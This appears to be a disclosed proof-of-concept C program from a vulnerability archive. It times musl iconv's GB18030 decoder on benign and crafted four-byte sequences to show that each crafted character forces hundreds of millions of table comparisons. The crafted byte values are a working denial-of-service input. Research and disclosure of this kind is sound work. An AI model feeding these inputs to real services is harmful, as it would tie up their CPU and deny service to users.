5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc_gb18030_dos.c C
/*
 * poc_gb18030_dos.c - PoC: Algorithmic complexity DoS in musl iconv
 *                     GB18030 and EUC-KR 4-byte / extended Hangul decoders
 *
 * The GB18030 4-byte decoder (iconv.c:434-442) contains a gap-skipping loop
 * that, for each decoded character, iterates the entire gb18030[126][190]
 * table (23,940 entries) to count how many 2-byte-mapped codepoints fall
 * within a sliding range. For inputs whose linear index lands just below
 * the dense CJK Unified Ideographs block (U+4E00-U+9FBD, ~20,902 entries),
 * the loop runs ~20,000+ iterations, each scanning all 23,940 entries.
 *
 * Result: ~500 million comparisons PER INPUT CHARACTER.
 * A small crafted input (e.g., 400 bytes = 100 characters) causes
 * ~50 billion comparisons, taking minutes to hours of CPU time.
 *
 * The same pattern exists in the EUC-KR extended Hangul decoder
 * (iconv.c:514-522) with ksc[93][94] (8,742 entries).
 *
 * To test on Alpine Linux (musl-based):
 *   docker run --rm -v $(pwd):/work -w /work alpine:latest \
 *     sh -c "apk add gcc musl-dev && gcc -O2 -o dos dos.c && ./dos"
 *
 * Compile: cc -O2 -o poc_gb18030_dos poc_gb18030_dos.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iconv.h>
#include <errno.h>
#include <time.h>
#include <stdint.h>

static double now(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return ts.tv_sec + ts.tv_nsec * 1e-9;
}

/*
 * Time how long it takes to iconv() a buffer of `nchars` copies of
 * the given 4-byte sequence from GB18030 to UTF-8.
 * Returns elapsed wall-clock seconds, or -1 on iconv_open failure.
 */
static double time_gb18030_decode(const uint8_t seq[4], int nchars,
                                  const char *label)
{
    iconv_t cd = iconv_open("UTF-8", "GB18030");
    if (cd == (iconv_t)-1) {
        printf("  iconv_open failed: %s\n", strerror(errno));
        return -1.0;
    }

    size_t inlen = 4 * nchars;
    size_t outlen = 8 * nchars;  /* UTF-8 worst case: 4 bytes per char, generous */
    char *inbuf = malloc(inlen);
    char *outbuf = malloc(outlen);
    if (!inbuf || !outbuf) {
        perror("malloc");
        exit(1);
    }

    /* Fill input with copies of the sequence */
    for (int i = 0; i < nchars; i++)
        memcpy(inbuf + i * 4, seq, 4);

    char *inp = inbuf;
    size_t inleft = inlen;
    char *outp = outbuf;
    size_t outleft = outlen;

    printf("  [%s] %d chars (%zu bytes input)... ", label, nchars, inlen);
    fflush(stdout);

    double t0 = now();
    size_t ret = iconv(cd, &inp, &inleft, &outp, &outleft);
    double elapsed = now() - t0;

    size_t consumed = inlen - inleft;
    size_t produced = outlen - outleft;

    if (ret == (size_t)-1) {
        printf("error after %zu/%zu bytes (%.3fs): %s\n",
               consumed, inlen, elapsed, strerror(errno));
    } else {
        printf("ok, %zu bytes out, %.3fs (%.1f us/char)\n",
               produced, elapsed, elapsed / nchars * 1e6);
    }

    free(inbuf);
    free(outbuf);
    iconv_close(cd);
    return elapsed;
}

int main(void)
{
    printf("=============================================================\n");
    printf("musl iconv GB18030 algorithmic complexity DoS PoC\n");
    printf("=============================================================\n\n");

    /*
     * BENIGN input: 81 30 81 30
     * Linear index = (0*10+0)*1260 + (0*10+0) + 128 = 128
     * This is a low codepoint, the gap-skip loop terminates quickly.
     */
    uint8_t benign[] = { 0x81, 0x30, 0x81, 0x30 };

    /*
     * ADVERSARIAL input: 82 35 8F 33
     * Linear index = (1*10+5)*1260 + (14*10+3) + 128 = 19171
     * This lands just below the dense CJK block (U+4E00 = 19968).
     * The gap-skip loop must "chase" through ~20,902 dense entries,
     * running ~20,905 iterations each scanning 23,940 table entries.
     */
    uint8_t adversarial[] = { 0x82, 0x35, 0x8F, 0x33 };

    /*
     * Another adversarial input right at the CJK boundary
     */
    uint8_t adversarial2[] = { 0x82, 0x35, 0x90, 0x30 };

    printf("--- Benign input (fast path) ---\n");
    double t_benign_1 = time_gb18030_decode(benign, 1, "benign x1");
    double t_benign_10 = time_gb18030_decode(benign, 10, "benign x10");
    double t_benign_100 = time_gb18030_decode(benign, 100, "benign x100");

    printf("\n--- Adversarial input (triggers dense CJK loop) ---\n");
    printf("    WARNING: 1 char may take several seconds!\n");
    double t_adv_1 = time_gb18030_decode(adversarial, 1, "adversarial x1");

    /* Only continue if the first one wasn't too slow */
    double t_adv_5 = -1;
    if (t_adv_1 < 30.0 && t_adv_1 > 0) {
        t_adv_5 = time_gb18030_decode(adversarial, 5, "adversarial x5");
    } else if (t_adv_1 > 0) {
        printf("  (skipping larger tests, single char took %.1fs)\n", t_adv_1);
    }

    printf("\n--- Adversarial input #2 ---\n");
    double t_adv2_1 = time_gb18030_decode(adversarial2, 1, "adversarial2 x1");

    printf("\n=============================================================\n");
    printf("Results:\n");
    printf("  Benign (100 chars):      %.6f s\n", t_benign_100);
    if (t_adv_1 > 0) {
        printf("  Adversarial (1 char):    %.6f s\n", t_adv_1);
        if (t_benign_1 > 0 && t_benign_1 > 1e-9) {
            printf("  Slowdown factor:         %.0fx per character\n",
                   t_adv_1 / t_benign_1);
        }
        if (t_adv_1 > 0.01) {
            printf("  Projected 100 chars:     %.1f seconds\n", t_adv_1 * 100);
            printf("  Projected 1000 chars:    %.1f seconds (%.1f minutes)\n",
                   t_adv_1 * 1000, t_adv_1 * 1000 / 60);
            printf("  Projected 10000 chars:   %.1f minutes\n",
                   t_adv_1 * 10000 / 60);
        }
    }

    printf("  Compare: 40KB of benign GB18030 decodes in microseconds.\n");
    printf("=============================================================\n");

    return 0;
}